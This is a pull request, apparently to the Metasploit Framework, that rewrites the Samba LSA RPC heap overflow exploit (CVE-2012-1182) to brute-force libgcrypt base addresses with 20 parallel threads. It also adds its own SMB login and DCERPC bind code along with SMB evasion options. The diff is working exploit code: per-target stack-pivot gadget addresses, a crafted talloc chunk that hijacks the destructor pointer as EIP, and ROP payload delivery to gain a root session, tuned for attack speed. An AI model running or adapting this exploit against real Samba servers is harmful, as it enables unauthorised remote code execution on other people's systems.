### PR TITLE
[SAMBA CVE-2012-1182] improve bruteforce speed

### DIFF
--- a/modules/exploits/linux/samba/setinfopolicy_heap.rb
+++ b/modules/exploits/linux/samba/setinfopolicy_heap.rb
@@ -7,19 +7,22 @@
 
 
 require 'msf/core'
+require 'rex/proto/smb'
+require 'rex/proto/ntlm'
+require 'rex/proto/dcerpc'
 
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
 
-	include Msf::Exploit::Remote::DCERPC
-	include Msf::Exploit::Remote::SMB
+	include Exploit::Remote::Tcp
 	include Msf::Exploit::RopDb
-	include Msf::Exploit::Brute
+
+	NDR = Rex::Encoder::NDR
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'Samba SetInformationPolicy AuditEventsInfo Heap Overflow',
+			'Name'	   => 'Samba SetInformationPolicy AuditEventsInfo Heap Overflow',
 			'Description'    => %q{
 					This module triggers a vulnerability in the LSA RPC service of the Samba daemon
 				because of an error on the PIDL auto-generated code. Making a specially crafted
@@ -32,7 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				provides the StartBrute and StopBrute which allow the user to configure his own
 				addresses.
 			},
-			'Author'         =>
+			'Author'	 =>
 				[
 					'Unknown', # Vulnerability discovery
 					'blasty', # Exploit
@@ -40,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					'sinn3r', # Metasploit module
 					'juan vazquez' # Metasploit module
 				],
-			'License'        => MSF_LICENSE,
+			'License'	=> MSF_LICENSE,
 			'References'     =>
 				[
 					['CVE', '2012-1182'],
@@ -49,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-069/']
 				],
 			'Privileged'     => true,
-			'Payload'        =>
+			'Payload'	=>
 				{
 					'DisableNops' => true,
 					'Space'       => 600,
@@ -57,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Platform'      => ['unix', 'linux'],
 			# smbd process is killed soon after being exploited, need fork with meterpreter
 			'DefaultOptions' => { "PrependSetreuid" => true, "PrependSetregid" => true, "PrependFork" => true, "AppendExit" => true, "WfsDelay" => 5},
-			'Targets'        =>
+			'Targets'	=>
 				[
 					['2:3.5.11~dfsg-1ubuntu2 on Ubuntu Server 11.10',
 						{
@@ -65,12 +68,9 @@ class Metasploit3 < Msf::Exploit::Remote
 							'Offset' => 0x11c0,
 							'Ropname' => 'Ubuntu 11.10 / 2:3.5.8~dfsg-1ubuntu2',
 							'Stackpivot' => 0x0004393c, # xchg eax, esp ; ret in /lib/i386-linux-gnu/libgcrypt.so.11.7.0
-							'Bruteforce' =>
-								{
-									'Start' => { 'libgcrypt_base' => 0xb67f1000 },
-									'Stop'  => { 'libgcrypt_base' => 0xb69ef000 },
-									'Step'  => 0x1000
-								}
+							'Start' => 0xb67f1000 ,
+							'Stop'  => 0xb69ef000 ,
+							'Step'  => 0x1000,
 						}
 					],
 					['2:3.5.8~dfsg-1ubuntu2 on Ubuntu Server 11.10',
@@ -79,12 +79,9 @@ class Metasploit3 < Msf::Exploit::Remote
 							'Offset' => 0x11c0,
 							'Ropname' => 'Ubuntu 11.10 / 2:3.5.8~dfsg-1ubuntu2',
 							'Stackpivot' => 0x0004393c, # xchg eax, esp ; ret in /lib/i386-linux-gnu/libgcrypt.so.11.7.0
-							'Bruteforce' =>
-								{
-									'Start' => { 'libgcrypt_base' => 0xb68d9000 },
-									'Stop'  => { 'libgcrypt_base' => 0xb6ad7000 },
-									'Step'  => 0x1000
-								}
+							'Start' => 0xb68d9000 ,
+							'Stop'  => 0xb6ad7000 ,
+							'Step'  => 0x1000,
 						}
 					],
 					['2:3.5.8~dfsg-1ubuntu2 on Ubuntu Server 11.04',
@@ -97,12 +94,9 @@ class Metasploit3 < Msf::Exploit::Remote
 							# we jump on "pop ecx, jmp dword [esi] to remove 4 bytes from the stack, then jump on pop esp.. gadget
 							# to effectively stack pivot
 							'Stackpivot_helper' => 0x00054e87, #pop esp ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret  ;
-							'Bruteforce' =>
-								{
-									'Start' => { 'libgcrypt_base' => 0xb6973000 },
-									'Stop'  => { 'libgcrypt_base' => 0xb6b71000 },
-									'Step'  => 0x1000
-								}
+							'Start' => 0xb6973000 ,
+							'Stop'  => 0xb6b71000 ,
+							'Step'  => 0x1000,
 						}
 					],
 					# default version when installing 11.04 is 3.5.8 , 3.5.4 was PROPOSED on CD months before release date
@@ -127,12 +121,9 @@ class Metasploit3 < Msf::Exploit::Remote
 							'Offset' => 0x11c0,
 							'Ropname' => 'Ubuntu 10.10 / 2:3.5.4~dfsg-1ubuntu8',
 							'Stackpivot' => 0x0003e4bc, #xchg eax, esp ; ret in libgcrypt.so.11.5.3
-							'Bruteforce' =>
-								{
-									'Start' => { 'libgcrypt_base' => 0xb694f000 },
-									'Stop'  => { 'libgcrypt_base' => 0xb6b4d000 },
-									'Step'  => 0x1000
-								}
+							'Start' => 0xb694f000 ,
+							'Stop'  => 0xb6b4d000 ,
+							'Step'  => 0x1000,
 						}
 					],
 					['2:3.5.6~dfsg-3squeeze6 on Debian Squeeze',
@@ -141,12 +132,9 @@ class Metasploit3 < Msf::Exploit::Remote
 							'Offset' => 0x11c0,
 							'Ropname' => 'Debian Squeeze / 2:3.5.6~dfsg-3squeeze6',
 							'Stackpivot' => 0x0003e30c, #xchg eax, esp ; ret in libgcrypt.so.11.5.3
-							'Bruteforce' =>
-								{
-									'Start' => { 'libgcrypt_base' => 0xb6962000 },
-									'Stop'  => { 'libgcrypt_base' => 0xb6a61000 },
-									'Step'  => 0x1000
-								}
+							'Start' => 0xb6962000 ,
+							'Stop'  => 0xb6a61000 ,
+							'Step'  => 0x1000,
 						}
 					],
 					['3.5.10-0.107.el5 on CentOS 5',
@@ -155,12 +143,9 @@ class Metasploit3 < Msf::Exploit::Remote
 							'Offset' => 0x11c0,
 							'Ropname' => '3.5.10-0.107.el5 on CentOS 5',
 							'Stackpivot' => 0x0006ad7e, #xchg eax, esp ; xchg eax, ebx ; add eax, 0xCB313435 ; or ecx, eax ; ret in libgcrypt.so.11.5.2
-							'Bruteforce' =>
-								{
-									'Start' => { 'libgcrypt_base' => 0x0037c000 },
-									'Stop'  => { 'libgcrypt_base' => 0x09e73000 },
-									'Step'  => 0x1000
-								}
+							'Start' => 0x0037c000 ,
+							'Stop'  => 0x09e73000 ,
+							'Step'  => 0x1000,
 						}
 					]
 
@@ -171,46 +156,133 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		register_options([
 			OptInt.new("StartBrute", [ false, "Start Address For Brute Forcing" ]),
-			OptInt.new("StopBrute", [ false, "Stop Address For Brute Forcing" ])
+			OptInt.new("StopBrute", [ false, "Stop Address For Brute Forcing" ]),
+			OptInt.new('RPORT', [ true, 'Set the SMB service port', 445])
 		], self.class)
+		register_advanced_options(
+		[
+			OptBool.new('SMBDirect', [ true, 'The target port is a raw SMB service (not NetBIOS)', true ]),
+			OptString.new('SMBUser', [ false, 'The username to authenticate as', '']),
+			OptString.new('SMBPass', [ false, 'The password for the specified username', '']),
+			OptString.new('SMBDomain',  [ false, 'The Windows domain to use for authentication', '.']),
+			OptString.new('SMBName', [ true, 'The NetBIOS hostname (required for port 139 connections)', '*SMBSERVER']),
+			OptBool.new('SMB::VerifySignature', [ true, "Enforces client-side verification of server response signatures", false]),
+			OptInt.new('SMB::ChunkSize', [ true, 'The chunk size for SMB segments, bigger values will increase speed but break NT 4.0 and SMB signing', 500]),
+			#
+			# Control the identified operating system of the client
+			#
+			OptString.new('SMB::Native_OS', [ true, 'The Native OS to send during authentication', 'Windows 2000 2195']),
+			OptString.new('SMB::Native_LM', [ true, 'The Native LM to send during authentication', 'Windows 2000 5.0']),
 
+		], self.class)
+		register_evasion_options(
+		[
+			OptBool.new('SMB::pipe_evasion',     [ true, 'Enable segmented read/writes for SMB Pipes', false]),
+			OptInt.new('SMB::pipe_write_min_size', [ true, 'Minimum buffer size for pipe writes',  1]),
+			OptInt.new('SMB::pipe_write_max_size', [ true, 'Maximum buffer size for pipe writes', 1024]),
+			OptInt.new('SMB::pipe_read_min_size',  [ true, 'Minimum buffer size for pipe reads',  1]),
+			OptInt.new('SMB::pipe_read_max_size',  [ true, 'Maximum buffer size for pipe reads', 1024]),
+			OptInt.new('SMB::pad_data_level',  [ true, 'Place extra padding between headers and data (level 0-3)', 0]),
+			OptInt.new('SMB::pad_file_level',  [ true, 'Obscure path names used in open/create (level 0-3)', 0]),
+			OptInt.new('SMB::obscure_trans_pipe_level',  [ true, 'Obscure PIPE string in TransNamedPipe (level 0-3)', 0]),
+
+		], self.class)
 	end
 
 	def exploit
-		if target.bruteforce?
-			bf = target.bruteforce
+		start = target["Start"]
+		stop = target["Stop"]
+		step = target["Step"]
 
-			if datastore['StartBrute'] and datastore['StartBrute'] > 0
-				bf.start_addresses['libgcrypt_base'] = datastore['StartBrute']
-			end
+		start = datastore["StartBrute"] if (datastore["StartBrute"] and datastore["StartBrute"] > 0 )
+		stop  = datastore["StopBrute"] if (datastore["StopBrute"] and datastore["StopBrute"] > 0 )
 
-			if datastore['StopBrute'] and datastore['StopBrute'] > 0
-				bf.stop_addresses['libgcrypt_base'] = datastore['StopBrute']
-			end
-
-			if bf.start_addresses['libgcrypt_base'] > bf.stop_addresses['libgcrypt_base']
-				raise ArgumentError, "StartBrute should not be larger than StopBrute"
-			end
+		if start > stop
+			raise ArgumentError, "StartBrute should not be larger than StopBrute"
 		end
-		super
+
+		curr_addr = start
+		i = 0
+		count = (stop-start)/step
+
+		thread_nb = 20
+		t = []
+
+		while curr_addr <= stop and not session_created?
+			while (t.length < thread_nb)
+				break if session_created?
+				i += 1
+				tcp = connect(false)
+				t << framework.threads.spawn("Module(#{self.refname})-#{curr_addr}",false, curr_addr, i, count, tcp) do |addr, i, count, tcp|
+					begin
+						ok = false
+						err_count = 0
+						while ok != true and not session_created?
+							begin
+								do_one(addr, i, count, tcp)
+								ok = true
+							rescue ::Exception => e
+								print_status("The following  error was encountered: #{e.class} #{e}, sleeping 1s and retrying with same address")
+								select(nil, nil, nil, 1)
+								err_count += 1
+								# dont loop indefinitely
+								if err_count == 3
+									ok = true
+								end
+							end
+						end
+					end
+				end
+				curr_addr += step
+				break if curr_addr > stop
+			end
+			t.first.join
+			t.delete_if { |x| not x.alive? }
+		end
+		if not session_created?
+			print_error("Exploit failed")
+		else
+			print_good("Exploit succeeded")
+		end
 	end
 
-	def brute_exploit(target_addrs)
-		print_status("Trying to exploit Samba with address 0x%.8x..." % target_addrs['libgcrypt_base'])
+	def check
+		begin
+			tcp = connect(false)
+			c = my_smb_login(tcp)
+			disconnect(tcp)
+
+			version = c.client.peer_native_lm.scan(/Samba (\d\.\d.\d*)/).flatten[0]
+			minor   = version.scan(/\.(\d*)$/).flatten[0].to_i
+			print_status("Version found: #{version}")
+
+			return Exploit::CheckCode::Appears if version =~ /^3\.4/ and minor < 16
+			return Exploit::CheckCode::Appears if version =~ /^3\.5/ and minor < 14
+			return Exploit::CheckCode::Appears if version =~ /^3\.6/ and minor < 4
+
+			return Exploit::CheckCode::Safe
+
+		rescue ::Exception
+			return CheckCode::Unknown
+		end
+	end
+
+	def do_one(addr, i, count, tcp)
+		print_status("Trying to exploit Samba with address 0x%.8x (%i/%i)..." % [addr, i, count])
 		datastore['DCERPC::fake_bind_multi'] = false
 		datastore['DCERPC::max_frag_size'] = 4248
 		datastore['DCERPC::smb_pipeio'] = 'trans'
 		datastore['DCERPC::ReadTimeout'] = 3
 
 		pipe = "lsarpc"
+		# decrease thread priority, otherelse meterpreter .so cannot be sent as too much traffic is being sent by other threads
+		Thread.current.priority = -1
 
+		c = my_smb_login(tcp)
 
-		connect()
-		smb_login()
-
-		handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{pipe}"])
-		dcerpc_bind(handle)
-		dcerpc.socket.mode = 'rw'
+		my_handle = my_dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{pipe}"], self.rhost)
+		my_dcerpc = my_dcerpc_bind(my_handle, tcp, c)
+		my_dcerpc.socket.mode = 'rw'
 		# revert for other exploits
 		datastore['DCERPC::smb_pipeio'] = 'rw'
 
@@ -222,13 +294,13 @@ class Metasploit3 < Msf::Exploit::Remote
 			tmp << "\x00"*(816-tmp.length)
 			ret_addr =  addr
 		elsif target['Arch'] == ARCH_X86
-			cmd << generate_rop_payload('samba', payload.encoded,{'target'=>target['Ropname'], 'base'=> target_addrs['libgcrypt_base'] })
+			cmd << generate_rop_payload('samba', payload.encoded,{'target'=>target['Ropname'], 'base'=> addr })
 			tmp = cmd
 			tmp << "\x00"*(816-tmp.length)
-			ret_addr = target_addrs['libgcrypt_base']+target['Stackpivot']
+			ret_addr = addr+target['Stackpivot']
 			# will help in stack pivot when it's not eax pointing to shellcode
 			if target['Stackpivot_helper']
-				helper = target_addrs['libgcrypt_base']+target['Stackpivot_helper']
+				helper = addr+target['Stackpivot_helper']
 			end
 		end
 
@@ -243,23 +315,24 @@ class Metasploit3 < Msf::Exploit::Remote
 		stub << NDR.long(0)
 		stub << NDR.long(100)
 		stub << rand_text_alpha(target['Offset'])
+
 		# Crafted talloc chunk
-		#stub << 'A' * 8                       # next, prev
-		stub << NDR.long(helper) + 'A'*4        # next, prev
+		#stub << 'A' * 8			   # next, prev
+		stub << NDR.long(helper) + 'A'*4	# next, prev
 		stub << NDR.long(0) + NDR.long(0)     # parent, child
-		stub << NDR.long(0)                   # refs
-		#		stub << NDR.long(target_addrs['Ret']) # destructor # will become EIP
+		stub << NDR.long(0)		   # refs
+#		stub << NDR.long(target_addrs['Ret']) # destructor # will become EIP
 		stub << NDR.long(ret_addr) # destructor # will become EIP
-		stub << NDR.long(0)                   # name
-		stub << "AAAA"                        # size
-		stub << NDR.long(0xe8150c70)          # flags
+		stub << NDR.long(0)		   # name
+		stub << "AAAA"			# size
+		stub << NDR.long(0xe8150c70)	  # flags
 		stub << "AAAABBBB"
 		stub << tmp # pointer to tmp+4 in $esp
 		stub << rand_text(32632)
 		stub << rand_text(62000)
 
 		begin
-			call(dcerpc, 0x08, stub)
+			call(my_dcerpc, 0x08, stub)
 		rescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply, ::EOFError
 		rescue Rex::Proto::DCERPC::Exceptions::Fault
 			print_error('Server is most likely patched...')
@@ -273,28 +346,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			end
 		end
 		handler()
-		disconnect()
-	end
-
-	def check
-		begin
-			connect()
-			smb_login()
-			disconnect()
-
-			version = smb_peer_lm().scan(/Samba (\d\.\d.\d*)/).flatten[0]
-			minor   = version.scan(/\.(\d*)$/).flatten[0].to_i
-			print_status("Version found: #{version}")
-
-			return Exploit::CheckCode::Appears if version =~ /^3\.4/ and minor < 16
-			return Exploit::CheckCode::Appears if version =~ /^3\.5/ and minor < 14
-			return Exploit::CheckCode::Appears if version =~ /^3\.6/ and minor < 4
-
-			return Exploit::CheckCode::Safe
-
-		rescue ::Exception
-			return CheckCode::Unknown
-		end
+		disconnect(tcp)
 	end
 
 	# Perform a DCE/RPC Function Call
@@ -347,7 +399,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def make_request(opnum=0, data="", size=data.length, ctx=0, object_id = '')
 
 		opnum = opnum.to_i
-		size = size.to_i
+		size  = size.to_i
 		ctx   = ctx.to_i
 
 		chunks, frags = [], []
@@ -391,5 +443,94 @@ class Metasploit3 < Msf::Exploit::Remote
 		data.length
 	end
 
-end
+	def my_smb_login(tcp)
 
+		c = Rex::Proto::SMB::SimpleClient.new(tcp, true)
+
+		c.login(
+			datastore['SMBName'],
+			datastore['SMBUser'],
+			datastore['SMBPass'],
+			datastore['SMBDomain'],
+			datastore['SMB::VerifySignature'],
+			datastore['NTLM::UseNTLMv2'],
+			datastore['NTLM::UseNTLM2_session'],
+			datastore['NTLM::SendLM'],
+			datastore['NTLM::UseLMKey'],
+			datastore['NTLM::SendNTLM'],
+			datastore['SMB::Native_OS'],
+			datastore['SMB::Native_LM'],
+			{:use_spn => datastore['NTLM::SendSPN'], :name =>  self.rhost}
+		)
+		c.connect("\\\\#{datastore['RHOST']}\\IPC$")
+		return c
+	end
+
+
+	def my_dcerpc_handle(uuid, version, protocol, opts, rhost)
+		return Rex::Proto::DCERPC::Handle.new([uuid, version], protocol, rhost, opts)
+
+	end
+
+	def my_dcerpc_bind(h, tcp, smb_client = nil)
+		opts = { 'Msf' => framework, 'MsfExploit' => self }
+
+		if datastore['DCERPC::max_frag_size']
+			opts['frag_size'] = datastore['DCERPC::max_frag_size']
+		end
+
+		if datastore['DCERPC::fake_bind_multi']
+			opts['fake_multi_bind'] = 1
+
+			if datastore['DCERPC::fake_bind_multi_prepend']
+				opts['fake_multi_bind_prepend'] = datastore['DCERPC::fake_bind_multi_prepend']
+			end
+
+			if datastore['DCERPC::fake_bind_multi_append']
+				opts['fake_multi_bind_append'] = datastore['DCERPC::fake_bind_multi_append']
+			end
+		end
+
+		opts['connect_timeout'] = (datastore['ConnectTimeout'] || 10).to_i
+
+		opts['read_timeout']    = (datastore['DCERPC::ReadTimeout'] || 10).to_i
+
+
+		# Configure the SMB evasion options
+
+		if (datastore['SMBUser'])
+			opts['smb_user'] = datastore['SMBUser']
+		end
+
+		if (datastore['SMBPass'])
+			opts['smb_pass'] = datastore['SMBPass']
+		end
+
+		if (datastore['DCERPC::smb_pipeio'])
+			opts['smb_pipeio'] = datastore['DCERPC::smb_pipeio']
+		end
+
+		if (datastore['SMB::pipe_write_min_size'])
+			opts['pipe_write_min_size'] = datastore['SMB::pipe_write_min_size']
+		end
+
+		if (datastore['SMB::pipe_write_max_size'])
+			opts['pipe_write_max_size'] = datastore['SMB::pipe_write_max_size']
+		end
+
+		if (datastore['SMB::pipe_read_min_size'])
+			opts['pipe_read_min_size'] = datastore['SMB::pipe_read_min_size']
+		end
+		if (datastore['SMB::pipe_read_max_size'])
+			opts['pipe_read_max_size'] = datastore['SMB::pipe_read_max_size']
+		end
+		if (smb_client)
+			opts['smb_client'] = smb_client
+		end
+
+		# Create the DCERPC client
+		my_dcerpc = Rex::Proto::DCERPC::Client.new(h, tcp, opts)
+
+		return my_dcerpc
+	end
+end

--- a/modules/exploits/linux/samba/setinfopolicy_heap.rb
+++ b/modules/exploits/linux/samba/setinfopolicy_heap.rb
@@ -209,7 +209,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		t = []
 
 		while curr_addr <= stop and not session_created?
-			while (t.length < thread_nb)
+			while t.length < thread_nb
 				break if session_created?
 				i += 1
 				tcp = connect(false)
@@ -252,15 +252,30 @@ class Metasploit3 < Msf::Exploit::Remote
 			c = my_smb_login(tcp)
 			disconnect(tcp)
 
-			version = c.client.peer_native_lm.scan(/Samba (\d\.\d.\d*)/).flatten[0]
-			minor   = version.scan(/\.(\d*)$/).flatten[0].to_i
-			print_status("Version found: #{version}")
+			native_lm = c.client.peer_native_lm
+			#let's be paranoid
+			if native_lm
+				version = native_lm.scan(/Samba (\d\.\d.\d*)/).flatten[0]
+				if version
+					minor_str = version.scan(/\.(\d*)$/).flatten[0]
+					if minor_str
+						minor   = minor_str.to_i
+						print_status("Version found: #{version}")
 
-			return Exploit::CheckCode::Appears if version =~ /^3\.4/ and minor < 16
-			return Exploit::CheckCode::Appears if version =~ /^3\.5/ and minor < 14
-			return Exploit::CheckCode::Appears if version =~ /^3\.6/ and minor < 4
+						return Exploit::CheckCode::Appears if version =~ /^3\.4/ and minor < 16
+						return Exploit::CheckCode::Appears if version =~ /^3\.5/ and minor < 14
+						return Exploit::CheckCode::Appears if version =~ /^3\.6/ and minor < 4
 
-			return Exploit::CheckCode::Safe
+						return Exploit::CheckCode::Safe
+					else
+						return CheckCode::Unknown
+					end
+				else
+					return CheckCode::Unknown
+				end
+			else
+				return CheckCode::Unknown
+			end
 
 		rescue ::Exception
 			return CheckCode::Unknown
@@ -498,33 +513,33 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		# Configure the SMB evasion options
 
-		if (datastore['SMBUser'])
+		if datastore['SMBUser']
 			opts['smb_user'] = datastore['SMBUser']
 		end
 
-		if (datastore['SMBPass'])
+		if datastore['SMBPass']
 			opts['smb_pass'] = datastore['SMBPass']
 		end
 
-		if (datastore['DCERPC::smb_pipeio'])
+		if datastore['DCERPC::smb_pipeio']
 			opts['smb_pipeio'] = datastore['DCERPC::smb_pipeio']
 		end
 
-		if (datastore['SMB::pipe_write_min_size'])
+		if datastore['SMB::pipe_write_min_size']
 			opts['pipe_write_min_size'] = datastore['SMB::pipe_write_min_size']
 		end
 
-		if (datastore['SMB::pipe_write_max_size'])
+		if datastore['SMB::pipe_write_max_size']
 			opts['pipe_write_max_size'] = datastore['SMB::pipe_write_max_size']
 		end
 
-		if (datastore['SMB::pipe_read_min_size'])
+		if datastore['SMB::pipe_read_min_size']
 			opts['pipe_read_min_size'] = datastore['SMB::pipe_read_min_size']
 		end
-		if (datastore['SMB::pipe_read_max_size'])
+		if datastore['SMB::pipe_read_max_size']
 			opts['pipe_read_max_size'] = datastore['SMB::pipe_read_max_size']
 		end
-		if (smb_client)
+		if smb_client
 			opts['smb_client'] = smb_client
 		end
 


### PR DESCRIPTION
Improve bruteforce speed

I didn't integrate the "Brute" mixin part as it might be removed in the future if the multithreaded bruteforce  in this module works with all versions (see juan comment @ https://github.com/rapid7/metasploit-framework/pull/987/). This commit is the continuation of work done in PR 987.

Speed comparison : 
- Brute mixin : around 30 tries/min
- this commit : around 100 tries/min

I don't know where the bottleneck is, but I get only around 200/250 KB/s on a gigabyte link. Ruby process runs at 100%.  No "real" threads handling from ruby? GIL being the problem?

Error handling is very rough and would probably need some polishing
